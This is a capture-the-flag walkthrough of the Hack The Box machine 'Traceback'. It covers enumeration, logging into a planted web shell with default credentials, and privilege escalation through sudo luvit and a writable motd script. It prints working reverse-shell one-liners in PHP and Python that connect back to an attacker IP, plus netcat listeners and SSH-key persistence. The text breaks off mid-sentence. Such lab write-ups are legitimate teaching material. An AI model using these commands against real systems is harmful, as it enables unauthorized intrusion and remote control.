This machine was challenging, but I learned a lot. I learned how to make “smarter” shells and how to upload the
pspy script to a remote server. I wonder if I could have completed this machine without adding my public ssh key, because at the moment it is very identifiable. It was a good box tho. I look forward to my next one.
First things first, let’s run our
nmap scan. I used the command
sudo nmap -sS -sV -p- traceback.htb.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-24 00:33 EDT Nmap scan report for traceback.htb (10.10.10.181) Host is up (0.12s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 860.02 seconds
As usual with a htb machine there is a website being hosted, and it looks like the machine is pwned already. If we view the page source we can see the comment
<!--Some of the best web shells that you might need ;)-->, so there might be a web shell some where. I am going to do a
ffuf scan on the domain. The command I used is
ffuf -u http://traceback.htb/FUZZ -w /usr/share/dirb/wordlists/big.txt -e .html,.txt,.php,.xml.
That did not teach us anything new, but after googling some stuff about the author… considering that he signed the first page of the web site I found a repository that he forked called
Web-Shells. So I created a wordlist with the files in that repo and after running the command
ffuf -u http://traceback.htb/FUZZ -w web_shell_wordlist.txt,
ffuf found the shell
smevk.php, unfortunately it is locked behind a login screen.
If we take a look at the source code for this shell in the GitHub repo we can see that the default credentials are
admin::admin. If we try them they work! Awesome so we got into the web shell.
Once we are in there is a field where we can execute a command. So let’s create a reverse shell. First on our attacking machine use the command
nc -lvnp 1234, then I used a
php reverse shell because I know the server can run
php. Here is the code I ran on the web shell
php -r '$sock=fsockopen("10.10.14.100",1234);exec("/bin/sh -i <&3 >&3 2>&3");'. Change the IP address to what is on the IPv4 section on the access page on the HTB web site.
In our shell we are the user
webadmin, let’s navigate to this user’s home directory by using the command
cd /home/webadmin. In here we see a note file that reads:
- sysadmin - I have left a tool to practice Lua. I'm sure you know where to find it. Contact me if you have any question.
I found it by using
sudo -l. It seems there is a file called
/home/sysadmin/luvit that we should be able to run. After a quick google search it turns out that
luvit can be used to run
User webadmin may run the following commands on traceback: (sysadmin) NOPASSWD: /home/sysadmin/luvit
We can get some code to spawn another shell from here. We can create the script by
echoing the content of the script into a file in the
/tmp directory then running the script with
sudo -u sysadmin /home/sysadmin/luvit script.lua. Because when we did
sudo -l we found out that we can run
sysadmin without a password. Okay so here is what I did step by step:
First I navigated to the
/tmp directory, then I echoed the following code into a file called
Then I executed the command
sudo -u sysadmin /home/sysadmin/luvit script.lua. This throws us into another shell if we run
whoami then we are the
sysadmin user. But it is not that good looking, so let’s try and make a new reverse shell from this user. I just used to command
nc -lvnp 9999 on my attacking machine then used the command
php -r '$sock=fsockopen("10.10.14.100",9999);exec("/bin/sh -i <&3 >&3 2>&3");' from the ugly shell. There we go a better shell.
Now let’s get root, but first I upgraded the shell again with the command
python3 -c 'import pty; pty.spawn("/bin/bash")'. Okay so I added my ssh public key to the
authorized_keys file because I want to be able to reconnect fast if I mess up. This probably isn’t advisable. This also allows me to
pspy onto the machine to monitor the processes running. I notice that the files in the
/etc/update-motd.d get replaced by there backups frequently. Let’s check them out. It looks like we have permission to edit these files in the
update-motd.d directory. Let’s try and add some code and
ssh into the
sysadmin user to escalate privileges. This is a long shot, but here goes nothing.
First I started listening on my machine on port 9999 then I added the following code to the file
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.100",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Next I had to
ssh into the machine quickly before my script was over written. Once I
ssh back into the machine as
sysadmin this reverse shell was activated on my listening port. When I type
whoami, I am